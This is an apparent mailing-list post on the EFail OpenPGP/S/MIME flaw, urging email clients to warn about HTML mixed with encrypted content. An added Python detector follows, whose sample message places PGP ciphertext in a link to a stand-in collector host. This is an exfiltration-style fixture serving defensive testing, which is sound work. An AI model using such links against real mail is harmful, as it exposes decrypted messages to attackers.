EFail - OpenPGP S/MIME Vulnerability

Shawn K. Quinn skquinn at rushpost.com
Wed May 16 17:27:33 PDT 2018

On 05/15/2018 12:05 AM, Marina Brown wrote:
> Remember the campaign against HTML email? I do.
> We were right.

The campaign is still ongoing. Maybe we have lost in the case of the
vast majority of marketing/advertising lists, but Thunderbird and other
email clients (thankfully) offer the option to not automatically load
external links by default.

I do think a future version (actually, the next version) of Thunderbird
and/or Enigmail need to put up a big huge "danger" warning when they
detect HTML email mixed with encrypted content, especially when it looks
like someone has tried to put an encrypted blob as the destination of a
link (which, as I understand it, is how this exploit works). There's no
good reason to do this, and plenty of bad reasons.

Shawn K. Quinn <skquinn at rushpost.com>
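
The check proposed in the message above, sketched as an added example (not part of the original post, and not Thunderbird or Enigmail code). It generalizes slightly to the case where a link's quoted value is left open at the end of one MIME part and the encrypted part follows. The function name `efail_warnings`, the warning labels, the `collector.invalid` host and the placeholder ciphertext are all hypothetical.

```python
import email
import re
from email import policy

ARMOR = "-----BEGIN PGP MESSAGE-----"
ENC_TYPES = {"application/pgp-encrypted", "application/pkcs7-mime",
             "application/x-pkcs7-mime"}
# A src/href value whose opening quote is never closed before the part ends.
OPEN_ATTR = re.compile(r"""(?:src|href)\s*=\s*(["'])(?:(?!\1).)*\Z""", re.I | re.S)
# Armored ciphertext sitting inside a quoted src/href value.
ARMOR_IN_ATTR = re.compile(
    r"""(?:src|href)\s*=\s*(["'])(?:(?!\1).)*""" + re.escape(ARMOR), re.I | re.S)

def efail_warnings(raw: bytes) -> list[str]:
    """Return heuristic warning labels for one raw RFC 5322 message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    found = set()
    html_seen = enc_seen = open_attr = False
    for part in msg.walk():
        if part.is_multipart():
            continue  # only leaf parts carry content
        ctype = part.get_content_type()
        body = (part.get_payload(decode=True) or b"").decode("utf-8", "replace")
        encrypted = ctype in ENC_TYPES or ARMOR in body
        if encrypted and open_attr:
            # The previous HTML part ended inside a link; this part would be
            # absorbed into that link if the client renders the parts together.
            found.add("ciphertext-follows-open-attribute")
        if ctype == "text/html":
            html_seen = True
            if ARMOR_IN_ATTR.search(body):
                found.add("ciphertext-inside-link")
        open_attr = ctype == "text/html" and bool(OPEN_ATTR.search(body))
        enc_seen |= encrypted
    if html_seen and enc_seen:
        found.add("html-mixed-with-encrypted")
    return sorted(found)

# Constructed samples; the ciphertext is a placeholder, not real data.
BLOB = ARMOR.encode() + b"\r\n(placeholder)\r\n-----END PGP MESSAGE-----"
SAMPLE_LINK = (b"Content-Type: text/html\r\n\r\n"
               b'<a href="http://collector.invalid/' + BLOB + b'">x</a>\r\n')
SAMPLE_CLEAN = b"Content-Type: text/plain\r\n\r\n" + BLOB + b"\r\n"

if __name__ == "__main__":
    print(efail_warnings(SAMPLE_LINK))
    print(efail_warnings(SAMPLE_CLEAN))
```

A mail client or gateway filter would run a check like this before decryption and withhold HTML rendering when any label is returned.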

